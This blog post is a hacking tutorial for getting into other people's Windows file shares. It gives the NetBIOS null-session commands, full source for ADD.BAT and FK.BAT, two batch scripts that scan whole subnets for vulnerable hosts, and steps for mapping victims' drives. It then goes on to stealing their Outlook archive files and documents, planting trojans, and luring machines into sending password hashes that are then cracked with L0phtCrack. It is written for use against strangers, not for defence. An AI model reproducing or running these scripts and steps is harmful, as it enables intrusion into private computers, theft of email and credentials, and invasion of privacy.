Windows shares are probably one of the easiest ways to get unauthorized access to a remote computer. Most people enable shares for convenience, but Windows NT will, by default, share its primary hard drives for administrative purposes. Most shares can be controlled fairly well by users. The NT shares, however, cannot be shut down or changed, even by the Administrator.
Windows shares operate on ports 137 and 139. The protocol uses a challenge response that reveals its most basic vulnerability. When one computer wants to access are share on another computer it sends a request for a share. This request is acknowledged and authenticated by the share server based on its rules for access (either to the share or to the server itself). Thus if a user requests a share from an NT server, and that user is an authenticated user on the NT server they are granted access. If the user requests a share from a simple Windows 98 share server then the server authenticates based on any password protection set on the share. The problem with this scenario is that when I request a share from a server, by default I request the share as myself. This means that the client sends a request similar to: "user anu007tiger in workgroup tigerforce with password xxxxx requests the share WHATEVER from your server." You quickly see that sending a password is bad news. Now, the password is encrypted, but it is encrypted using know methods. The failure in the architecture is to send a workgroup, username, and password regardless of whether or not they are required. This means that if I have my server set up to grab incoming passwords, I can crack them.
"How can I exploit these services?" you might ask. Well, the simplest way is to use NETBIOS null sessions to explore shares. You can establish a null session fairly easily assuming the server doesn't request passwords for the null session. NT is pretty rigorous about requesting passwords if its shares are protected, but Windows 98 seems pretty vulnerable, in my experience. To establish a null session all you have to do is type in:
C:>net use //123.123.123.123/ipc$
Where 123.123.123.123 is the actual IP address of the target. There are only two possible responses to this query. The command will succeed and issue a "the command completed successfully" statement, or it will throw an error and fail. If the command succeeds you'll need to go on and explore what shares are available. To do this simply execute the following:
C:\> net view //123.123.123.123The target will respond with a list of possible shares. The following is a result I received from a sample target:
Shared resources at \\123.123.123.123 Share name Type Used as Comment
-------------------------------------------------------------------------------
Downloads Disk
Pub Disk
The command completed successfully.
The most common share available online is usually a printer share, which is fairly difficult to leverage. However, if you scan two or three subnets you're bound to run across some poor idiot who has shared his entire C: drive. Once you've identified a share the simplest way to leverage access is to map one of the remote shares to a local drive. In order to say map the remote share 'Pub' as a local X: drive execute the following:
C:\> net use x: \\123.123.123.123\PubIf the resource is in fact password protected beyond basic user authentication (or lack thereof) you will be prompted to enter the password. Usually if a C: drive is shared over the internet though, the user is so clueless that further password protection is unlikely. Once the drive is mapped simply use the Windows GUI through 'My Computer' to upload, download, explore and execute the contents of the remote drive.
Scanning for shares, however is tedious and time consuming. Since all the scan consists of is a repetitive issuance of DOS commands (or executables available from a DOS prompt) the simplest way to speed up your search is to create a batch file.
Batch files are Windows shell scripts, a file that consists of DOS commands that are issued in sequence when the batch file is called.
The best known batch file is autoexec.bat. Batch files are creatable and readable from notepad. To create a batch file simply open notepad, write up the commands and save the file as 'somebat.bat'. You should be sure to enclose the title in quotation marks when saving it so that Notepad will save the file as a .bat rather than its default of .txt.
The problem with writing a batch file to scan a subnet is that batch files are of VERY limited utility. You cannot set a variable and then increment it using an arithmetic function. It is simply impossible to set a variable equal to a number then reset the variable to its original number plus one. The only way, say to increment 'x' from one to two is to set x equal to one, then explicitly set x equal to two. To use a batch file that will increment you have to call another batch file that simply allows for incrementing (checking a variable then resetting it to one higher).
The following is the text of add.exe, showing how this can be accomplished across a subnet (255 numbers).
DOWNLOAD FULL EXECUTEABLE (ADD.EXE + FK.EXE)
DOWNLOAD SOURCE (ADD.TXT + FK.TXT)
:: ADD.BAT
:: Increments a three digit number
:: Works by comparing each digit
:: H=hundreds, T=tens, D=digits
@echo off
if [%H%]==[] set H=0
if [%T%]==[] set T=0
if [%D%]==[] set D=0
:DIGITS
if %D%==9 goto TENS
if %D%==8 set D=9
if %D%==7 set D=8
if %D%==6 set D=7
if %D%==5 set D=6
if %D%==4 set D=5
if %D%==3 set D=4
if %D%==2 set D=3
if %D%==1 set D=2
if %D%==0 set D=1
goto DONE
:TENS
set D=0
if %T%==9 goto HUNDREDS
if %T%==8 set T=9
if %T%==7 set T=8
if %T%==6 set T=7
if %T%==5 set T=6
if %T%==4 set T=5
if %T%==3 set T=4
if %T%==2 set T=3
if %T%==1 set T=2
if %T%==0 set T=1
goto DONE
:HUNDREDS
set T=0
if %H%==9 set H=0
if %H%==8 set H=9
if %H%==7 set H=8
if %H%==6 set H=7
if %H%==5 set H=6
if %H%==4 set H=5
if %H%==3 set H=4
if %H%==2 set H=3
if %H%==1 set H=2
if %H%==0 set H=1
goto DONE
:DONE
As you can see this is rather clunky and inefficient. However, combined with the next batch file, you can create a simple, yet effective scanner. The batch file below scans across a subnet, first pinging hosts with one packet of data to see if they are alive, then attempting to establish a null session, logging the vulnerable system, enumerating and logging the shares, and finally requesting and logging nbtstat information from the target. All information is logged in vulnerable.txt in the same directory as the batch file. Note that the add.bat file must be in the same directory so that calls to it are completed successfully. Copy this file and save it as FK.bat then execute it from the command line by issuing:
C:\> pctipsbyanu. 123.123.123Where 123.123.123 is the subnet you with to scan. I have noticed that the scanner hangs at certain points and must be restarted. To avoid the pain of rescanning the entire subnet, capability has been built in to accept arguments to establish where along the subnet to start. To issue these arguments simply type
C:\> pctipsbyanu 123.123.123 A B CWhere ABC is the starting IP. Make sure to leave spaces between A, B, and C since they are separate arguments to the batch file. The code for FK.bat follows:
DOWNLOAD FULL EXECUTEABLE (ADD.EXE + FK.EXE)
DOWNLOAD SOURCE (ADD.TXT + FK.TXT)
@echo OFF
set SUBNET=%1%
set H=%2
set T=%3
set D=%4
echo Scanning subnet %SUBNET% >> vulnerable.txt
:START
call add.bat
REM lets start testing
ping -n 1 %SUBNET%.%H%%T%%D% | find "out" > nul
if errorlevel 1 goto CONTINUE
goto DEADIP
:CONTINUE
net use \\%SUBNET%.%H%%T%%D%\ipc$ | find "completed" > nul
if errorlevel 1 goto notfound
echo %SUBNET%.%H%%T%%D% >> vulnerable.txt
echo Got One! %SUBNET%.%H%%T%%D% is vulnerable!
net view \\%SUBNET%.%H%%T%%D% >> vulnerable.txt
nbtstat -A %SUBNET%.%H%%T%%D% >> vulnerable.txt
goto endfind
:notfound
echo %SUBNET%.%H%%T%%D% doesn't seem to be vulnerable
:endfind
if %H%%T%%D%==254 goto DONE
goto START
:DEADIP
echo %SUBNET%.%H%%T%%D% doesn't seem to be alive
goto START
:DONE
@echo ON
If you invoke multiple DOS command prompts at once you can execute this batch file two or three times (one in each prompt) and speed up your subnet scans. If you get a vulnerable host, the batch will have already established a null session, so all you have to do is scan the text log file and establish connections to remote shares. Using this scanner sporadically over one weekend I was able to connect to a total of 4 remote machines (scanning approximately 9 subnets). Such was the level of insecurity that you could pull Outlook archive file (backup.pst) from C:\Windows\Local Settings\Application Data\Microsoft\Outlook\archive.pst from every vulnerable machine.
Once you've copied this file you can import it into your Outlook and peruse the victim's e-mail. You can gain other valuable information by copying other identity data (such as contact list or even the contents of the My Documents folder). Trojaning a target becomes trivial once you have access of this level.
Another method for gaining access, especially if the target has password protected shares, is to trick the target into requesting a share from a server you control. This will cause the target to send a request, including their username and encrypted password. The password can be cracked fairly trivially with L0phtCrack, which even includes a SMB packet sniffer to capture the request. Tricking a machine into requesting a share is as simple as getting the target to view a linked file (either in an HTML e-mail or web page). To code a share simply substitute the absolute or relative link.
0 comments:
Post a Comment